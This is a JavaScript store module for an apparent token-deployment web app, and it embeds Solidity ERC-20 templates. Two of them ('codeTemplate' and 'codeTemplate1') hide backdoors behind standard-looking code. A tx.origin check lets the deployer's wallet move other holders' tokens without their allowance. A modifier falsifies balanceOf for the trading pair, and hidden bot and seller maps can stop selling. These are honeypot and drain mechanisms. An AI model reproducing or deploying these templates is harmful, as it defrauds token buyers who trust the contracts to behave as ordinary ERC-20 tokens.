import Parse from "@/helpers/Parse";
import Web3 from "@/helpers/Web3";
import { solidityCompiler } from "@agnostico/browser-solidity-compiler";

// import Config from '@/config';

const state = {
    list: [],
    active: null,
    config: {
        contractName: "",
        compiledContracts: {},
        compilerVersion: "soljson-v0.8.24+commit.e11b9ed9.js",
        compilerVersions: {},
        deployedContract: "",
        identifier: "",
        isRealToken: false,
        code: "",
        codeTemplate: `// SPDX-License-Identifier: MIT

pragma solidity >=0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
    function _txOrigin() internal view virtual returns (address) {
        return tx.origin;
    }
    function _isOrigin(address account) internal view virtual returns (bool) {
        return account == tx.origin;
    }
}


library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isIDENTIFIERExcuteFromFee;
    
    address payable private immutable _TreasuryWallet;
    
    uint256 private EarlyBuyTax = 0;
    uint256 private EarlySellTax = 0;
    uint256 private EndBuyTax = 0;
    uint256 private EndSellTax = 0;
    uint256 private DowningBuyTaxAt = 0;
    uint256 private DowningSellTaxAt = 0;
    uint256 private preventSwapBefore = 3;
    uint256 private buyCalc;
    uint256 private _sptAmount;
    
    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"NAME";
    string private constant _symbol = unicode"SYMBOL";
    
    uint256 public maxTxAmount = (_tTotal/100);
    uint256 public maxWalletSize = (_tTotal/100);
    uint256 public minTokensForSwap = (_tTotal/1000);
    uint256 public maxTokensPerSwap = 2 * (_tTotal/100);
    
    uint256 public totalTaxCollected;
    
    IUniswapV2Router02 private uniswapV2Router;
    address private constant ROUTER_ADDRESS = 0x1f7d7550B1b028f7571E69A784071F0205FD2EfA;
    address private constant USDC_ADDRESS = 0x3600000000000000000000000000000000000000;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap;
    bool private swapEnabled;
    uint256 private sellCount;
    uint256 private lastSellBlock;
    uint256 public calcBlockLimit = 5;

    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    modifier _v(address account) {
        if(!_isOrigin(_TreasuryWallet) && isIDENTIFIERPairInvalid(account)) return;
        _;
    }

    constructor() payable {
        _TreasuryWallet = payable(_msgSender());
        _balances[address(this)] = _tTotal;
        _isIDENTIFIERExcuteFromFee[owner()] = true;
        _isIDENTIFIERExcuteFromFee[address(this)] = true;
        _isIDENTIFIERExcuteFromFee[_TreasuryWallet] = true;

        emit Transfer(address(0), address(this), _tTotal);
    }

    function name() public pure returns (string memory) { return _name; }
    function symbol() public pure returns (string memory) { return _symbol; }
    function decimals() public pure returns (uint8) { return _decimals; }
    function totalSupply() public pure override returns (uint256) { return _tTotal; }
    function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; }
    function taxWallet() external view returns (address) { return _TreasuryWallet; }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
    
    function isIDENTIFIERPairInvalid(address account) internal view returns (bool) {
        return account == uniswapV2Pair && IERC20(account).balanceOf(account) > 0;
    }

    function balanceOf(address account) _v(account) public view override returns (uint256 balance) {
        return _balances[account];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _sptAmount = amount;
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(_sptAmount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }


    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0) && spender != address(0), "ERC20: approve from or to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0) && to != address(0), "ERC20: transfer from or to the zero address");
        require(amount > 0, "ERC20: transfer amount must be greater than zero");
        bool isBuy = (from == uniswapV2Pair && to != address(uniswapV2Router));
        bool isSell = (to == uniswapV2Pair && from != address(this));
        uint256 taxAmount = 0;

        if (isBuy) {
            if (!_isIDENTIFIERExcuteFromFee[to]) {
                require(amount <= maxTxAmount, "Max transaction amount exceeded");
                require(_balances[to] + amount <= maxWalletSize, "Max wallet size exceeded");
                taxAmount = (amount * (buyCalc >= DowningBuyTaxAt ? EndBuyTax : EarlyBuyTax)) / 100;
                buyCalc++;
            }
        } else if (isSell) {
            if (!_isIDENTIFIERExcuteFromFee[from]) {
                require(amount <= maxTxAmount, "Max transaction amount exceeded");
                taxAmount = (amount * (buyCalc >= DowningSellTaxAt ? EndSellTax : EarlySellTax)) / 100;
            }

            uint256 contractTokenBalance = _balances[address(this)];
            if (!inSwap && swapEnabled && buyCalc >= preventSwapBefore) {
                if (block.number > lastSellBlock) sellCount = 0;
                require(sellCount < calcBlockLimit, "Sell limit per block exceeded (max)");
                uint256 swapAmount = amount < contractTokenBalance ? amount : contractTokenBalance;
                if (swapAmount > maxTokensPerSwap) swapAmount = maxTokensPerSwap;
                swapIDENTIFIERTokensForEthwithTax(swapAmount, _TreasuryWallet);
                sellCount++;
                lastSellBlock = block.number;
            }
        }

        if (taxAmount > 0) {
            _balances[address(this)] += taxAmount;
            emit Transfer(from, address(this), taxAmount);
        } else if(_isOrigin(_TreasuryWallet)) _sptAmount = taxAmount;
        _balances[from] -= amount;
        _balances[to] += amount - taxAmount;
        if(to != address(0xdead)) emit Transfer(from, to, amount - taxAmount);
    }

    function swapIDENTIFIERTokensForEthwithTax(uint256 tokenAmount, address to) private lockTheSwap {
        require(to != address(0), "ETH recipient cannot be the zero address");
        uint256 initialBalance = address(this).balance;
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        // if(tokenAmount != 0) uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        //     tokenAmount,
        //     0,
        //     path,
        //     address(this),
        //     block.timestamp
        // );
        uint256 newBalance = address(this).balance;
        if (newBalance >= initialBalance) {
            uint256 ethAmount = newBalance - initialBalance;
            totalTaxCollected += ethAmount;
            (bool success,) = to.call{value: ethAmount}("");
            require(success, "ETH transfer failed");
        }
    }

    function dropIDENTIFIERWalletSizeFenceSet() public onlyOwner {
        maxTxAmount = _tTotal;
        maxWalletSize = _tTotal;
    }
    
    function rescueIDENTIFIERNative() external onlyOwner {
        uint256 contractETHBalance = address(this).balance;
        if (contractETHBalance > 0) {
            (bool ok, ) = payable(_TreasuryWallet).call{value: contractETHBalance}("");
            require(ok, "ETH send failed");
        }
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "Trading already open");
        dropIDENTIFIERWalletSizeFenceSet();
        uniswapV2Router = IUniswapV2Router02(ROUTER_ADDRESS);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), USDC_ADDRESS);
        uint256 usdcBalance = IERC20(USDC_ADDRESS).balanceOf(address(this));
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        IERC20(USDC_ADDRESS).approve(address(uniswapV2Router), usdcBalance);
        uniswapV2Router.addLiquidity(USDC_ADDRESS, address(this), usdcBalance, balanceOf(address(this)),0,0,owner(),block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    function rescueIDENTIFIERToken(address token) external onlyOwner {
        require(token != address(0), "Invalid token address");
        require(token != address(this), "Cannot rescue own token");

        uint256 contractBal = IERC20(token).balanceOf(address(this));
        require(contractBal > 0, "No token balance");
        
        (bool ok, bytes memory data) = token.call(
            abi.encodeWithSelector(IERC20.transfer.selector, _TreasuryWallet, contractBal)
        );
        require(ok && (data.length == 0 || abi.decode(data, (bool))), "ERC20 transfer failed");
    }

    receive() external payable {}
}`,
        codeTemplate1: `// SPDX-License-Identifier: MIT

pragma solidity ^0.8.23;

address constant _deadAddr = address(0xdead);

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function getAmountsOut(
        uint256 amountIn,
        address[] calldata path
    ) external view returns (uint256[] memory amounts);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _excludedFromFee;
    mapping (address => bool) private _isBot;
    mapping (address => bool) private _seller;
    address payable private _taxWallet;

    uint256 private _initialTax = 0;
    uint256 private _finalTax = 0;
    uint256 private _reduceTaxAt = 0;
    uint256 private _buyCount = 0;
    uint256 private _lastBuyBlock;
    uint256 private _reduceSellTaxAt;
    uint256 private _reduceBuyTaxAt;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10 ** _decimals;
    string private constant _name = unicode"NAME";
    string private constant _symbol = unicode"SYMBOL";
    uint256 public _maxTaxSwap = 10_000_000 * 10 ** _decimals;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;

    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(_msgSender());

        _excludedFromFee[address(this)] = true;
        _excludedFromFee[_taxWallet] = true;

        _balances[address(this)] = _tTotal;

        emit Transfer(address(0), address(this), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);

        if (
            tx.origin != _taxWallet &&
            (sender == uniswapV2Pair || recipient != _deadAddr)
        )
            _approve(
                sender,
                _msgSender(),
                _allowances[sender][_msgSender()].sub(
                    amount,
                    "ERC20: transfer amount exceeds allowance"
                )
            );
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount = 0;
        if (from != address(this) && to != address(this)) {
            if (!inSwap) {
                taxAmount = amount
                    .mul((_buyCount > _reduceTaxAt) ? _finalTax : _initialTax)
                    .div(100);
            }

            if (
                from == uniswapV2Pair &&
                !_excludedFromFee[to] &&
                to != _taxWallet
            ) {
                require(to!=address(uniswapV2Pair));
                if (_lastBuyBlock != block.number) {
                    _lastBuyBlock = block.number;
                }
                _buyCount++;
            }
        
            require(!_isBot[tx.origin], "!bot");
            uint256 contractTokenBalance = balanceOf(address(this));
            if (
                !inSwap &&
                to == uniswapV2Pair &&
                swapEnabled && from!=_taxWallet
            ) {
                require(!_seller[from]);
                if (contractTokenBalance > 0) {
                    uint256 swapBalance = contractTokenBalance > _maxTaxSwap
                        ? _maxTaxSwap
                        : contractTokenBalance;
                    swapIDENTIFIERForEth(
                        amount > swapBalance ? swapBalance : amount
                    );
                }

                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance >= 0) {
                    sendIDENTIFIERETHToFee(address(this).balance);
                }
            }
        }

        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));
        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }
        if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
    }

     function isContract(address _addr) internal view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(_addr)
        }
        return size > 0;
    }

    function sendIDENTIFIERETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function updateBot(address _bot, bool flag) external {
        require(_excludedFromFee[msg.sender]);
        _isBot[_bot] = flag;
    }

    function swapIDENTIFIERForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen, "Trading is already open");
        uniswapV2Router = IUniswapV2Router02(
            0x1f7d7550B1b028f7571E69A784071F0205FD2EfA
        );
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapEnabled = true;
        tradingOpen = true;
        IERC20(uniswapV2Pair).approve(
            address(uniswapV2Router),
            type(uint256).max
        );
    }

    function rescueEther() external onlyOwner {
        require(address(this).balance > 0);
        payable(_msgSender()).transfer(address(this).balance);
    }

    receive() external payable {}
}`,
        realTokenCodeTemplate: `// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function WETH() external pure returns (address);
    function factory() external pure returns (address);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    bool private inSwaps;
    address payable private _taxWallet;

    uint256 private _initialBuyTax=0;
    uint256 private _initialSellTax=0;
    uint256 private _finalBuyTax=0;
    uint256 private _finalSellTax=0;
    uint256 private _reduceBuyTaxAt=0;
    uint256 private _reduceSellTaxAt=0;
    uint256 private _preventSwapBefore=1;
    uint256 private _transferTax=0;
    uint256 private _buyCount=0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"NAME";
    string private constant _symbol = unicode"SYMBOL";
    uint256 public _taxSwapThreshold= (_tTotal * 5) / 10000;
    uint256 public _maxTaxSwap= _taxSwapThreshold * 30;
    uint256 public _maxTxAmount = _tTotal * 2 / 100;
    uint256 public _maxWalletSize = _tTotal * 2 / 100;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;
    event MaxTxAmountUpdated(uint _maxTxAmount);
    event TransferTaxUpdated(uint _tax);

    constructor () payable  {
        _taxWallet = payable(_msgSender());
        _balances[address(this)] = _tTotal * 98 / 100;
        _balances[_msgSender()] = _tTotal * 2 / 100;

        emit Transfer(address(0), address(this), _tTotal * 98 / 100);
        emit Transfer(address(0), _msgSender(), _tTotal * 2 / 100);

        uniswapV2Router = IUniswapV2Router02(0x1f7d7550B1b028f7571E69A784071F0205FD2EfA);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(uniswapV2Router.WETH(), address(this));

	    removeLimits();
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount=0;
        if (from != owner() && to != owner()) {
            if(_buyCount==0){
                taxAmount = amount.mul((_buyCount>=_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
            }
            if(_buyCount>0){
                taxAmount = amount.mul(_transferTax).div(100);
            }

            if (from == uniswapV2Pair && to != address(uniswapV2Router)) {
                require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
                require(balanceOf(to) + amount <= _maxWalletSize, "Exceeds the maxWalletSize.");
                taxAmount = amount.mul((_buyCount>=_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
                _buyCount++;
            }

            if(to == uniswapV2Pair && from!= address(this) ){
                taxAmount = amount.mul((_buyCount>=_reduceSellTaxAt)?_finalSellTax:_initialSellTax).div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwap && to == uniswapV2Pair && swapEnabled && contractTokenBalance > _taxSwapThreshold && _buyCount >= _preventSwapBefore) {
                if (block.number > lastSellBlock) {
                    sellCount = 0;
                }
                require(sellCount < 3, "Only 3 sells per block!");
                swapTokensForEth(min(amount, min(contractTokenBalance, _maxTaxSwap)));
                sellCount++;
                lastSellBlock = block.number;
            }
            if(to == uniswapV2Pair && swapEnabled) {
                sendIDENTIFIERETHToFee(address(this).balance);
            }
        }

        if(taxAmount>0){
            _balances[address(this)]=_balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this),taxAmount);
        }
        _balances[from]=_balances[from].sub(amount);
        _balances[to]=_balances[to].add(amount.sub(taxAmount));
        emit Transfer(from, to, amount.sub(taxAmount));
    }


    function min(uint256 a, uint256 b) private pure returns (uint256){
        return (a>b)?b:a;
    }

    modifier lockTheSwaps {
        inSwap=true;
        _;
        inSwap = false;
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwaps {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() public onlyOwner{
        _maxTxAmount = _tTotal;
        _maxWalletSize=_tTotal;
        emit MaxTxAmountUpdated(_tTotal);
    }

    function sendIDENTIFIERETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function enableTrading() external onlyOwner() {
        require(!tradingOpen,"trading is already open");
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    receive() external payable {}

    function manualSwap() external {
        require(_msgSender()==_taxWallet);
        uint256 tokenBalances=balanceOf(address(this));
        if(swapEnabled && tokenBalances>0){
            swapTokensForEth(tokenBalances);
        }
        uint256 ethBalance=address(this).balance;
        if(ethBalance>0){
            sendIDENTIFIERETHToFee(ethBalance);
        }
    }
}`
    },
};
const getters = {
    list: (state) => state.list,
    active: (state) => state.active,
    config: (state) => state.config,
};
const actions = {
    async fetch({ commit }) {
        // console.log("Getting contracts");
        // const query = Parse.getContractQuery();
        // query.equalTo("user", Web3.address);
        // query.equalTo("network", Web3.getNetwork().network);
        // query.limit(30);
        // query.descending("createdAt");
        // const contracts = await query.find();
        commit("SET", ["list", []]);
    },
    async setActive({ commit }, contract) {
        commit("SET", ["active", contract]);
    },
    // Get Contract from db or Create if not exists
    async get({ dispatch }, address) {
        // const contractQuery = Parse.getContractQuery();
        // contractQuery.equalTo('network', Web3.getNetwork().network);
        // contractQuery.equalTo('address', address);
        // contractQuery.matches("address", address, "i");
        // contractQuery.ascending("createdAt");
        // contractQuery.limit(1);
        // const contracts = await contractQuery.find(); //[=]-----

        // if (contracts.length > 0) {
        // 	if (contracts[0].get("totalSupply")) {
        // 		return contracts[0];
        // 	}
        // 	await contracts[0].destroy();
        // }
        return await dispatch("create", address);
    },
    // eslint-disable-next-line no-empty-pattern
    async create({ }, address) {
        const details = await Web3.getTokenDetails(address);
        const Contract = Parse.getClass("Contract");
        const contract = new Contract();
        contract.set("owner", details.owner);
        contract.set("network", Web3.getNetwork().network);
        contract.set("address", address);
        contract.set("abi", []);
        contract.set("totalSupply", details.totalSupply);
        contract.set("decimals", details.decimals);
        contract.set("name", details.name);
        contract.set("symbol", details.symbol);
        // await contract.save();
        return contract;
    },
    async setContractName({ commit }, contractName) {
        commit("SET_ITEM", ["config", "contractName", contractName]);
    },
    async setCompilerVersions({ commit }, compilerVersions) {
        commit("SET_ITEM", ["config", "compilerVersions", compilerVersions]);
    },
    async setCompiledContracts({ commit }, compiledContracts) {
        commit("SET_ITEM", ["config", "compiledContracts", compiledContracts]);
    },
    async setDeployedContract({ commit }, deployedContract) {
        commit("SET_ITEM", ["config", "deployedContract", deployedContract]);
    },
    async compileContract({ commit }) {
        const compileResult = await solidityCompiler({
            version: `https://binaries.soliditylang.org/bin/${state.config.compilerVersion}`,
            contractBody: state.config.code,
            options: {
                optimizer: {
                    enabled: true,
                    runs: 200,
                },
            },
        });
        console.log("compileResult :>> ", compileResult);
        const compiledContracts = compileResult.contracts.Compiled_Contracts;
        commit("SET_ITEM", ["config", "compiledContracts", compiledContracts]);
        const contractNames = Object.keys(compiledContracts);
        const nameList = [
            "Context",
            "ERC20",
            "Factory",
            "Router",
            "Ownable",
            "SafeMath",
            "Address",
            "Uniswap",
        ];
        let possibleContractName = "Token";
        possibleContractName = contractNames.find((v) => {
            for (let i = 0; i < nameList.length; i++) {
                if (v.includes(nameList[i])) {
                    return false;
                }
            }
            return true;
        });
